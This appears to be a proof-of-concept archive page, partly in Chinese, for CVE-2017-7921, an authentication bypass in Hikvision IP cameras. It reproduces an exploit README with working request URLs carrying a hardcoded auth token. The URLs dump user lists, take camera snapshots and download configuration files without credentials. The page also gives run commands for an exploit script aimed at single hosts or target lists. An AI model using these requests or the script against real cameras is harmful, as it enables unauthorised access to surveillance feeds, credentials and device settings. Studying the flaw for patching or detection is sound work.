关联漏洞
标题:
多款Hikvision产品安全漏洞
(CVE-2017-7921)
描述:Hikvision DS-2CD2xx2F-I Series等都是中国海康威视(Hikvision)公司的网络摄像头产品。 多款Hikvision产品中存在身份验证漏洞。攻击者可利用该漏洞提升权限,获取敏感信息的访问权限。以下产品和版本受到影响:Hikvision DS-2CD2xx2F-I Series 5.2.0 build 140721版本至5.4.0 build 160530版本;DS-2CD2xx0F-I Series 5.2.0 build 140721版本至5.4.0 Build 16040
描述
Hikvision camera CVE-2017-7921-EXP
介绍
# CVE-2017-7921 Exploit
An Improper Authentication issue was discovered in Hikvision devices.
The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users.
This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information.
https://seclists.org/fulldisclosure/2017/Sep/23
Vulnerability details:
\----------------------
Retrieve a list of all users and their roles:
http://camera.ip/Security/users?auth=YWRtaW46MTEK
Obtain a camera snapshot without authentication:
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
And worst of all, one can download camera configuration:
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
## Install dependence
```python
python3 -m pip install -r requirements.txt
```
## Usage
```python3
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run
```
## Screenshot
文件快照
[4.0K] /data/pocs/9af4ad04d2e1a0808db54d8da08703e56505c021
├── [5.2K] CVE_2017_7921_EXP.py
├── [1.1K] README.md
├── [ 45] requirements.txt
└── [692K] Screenshot.jpg
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。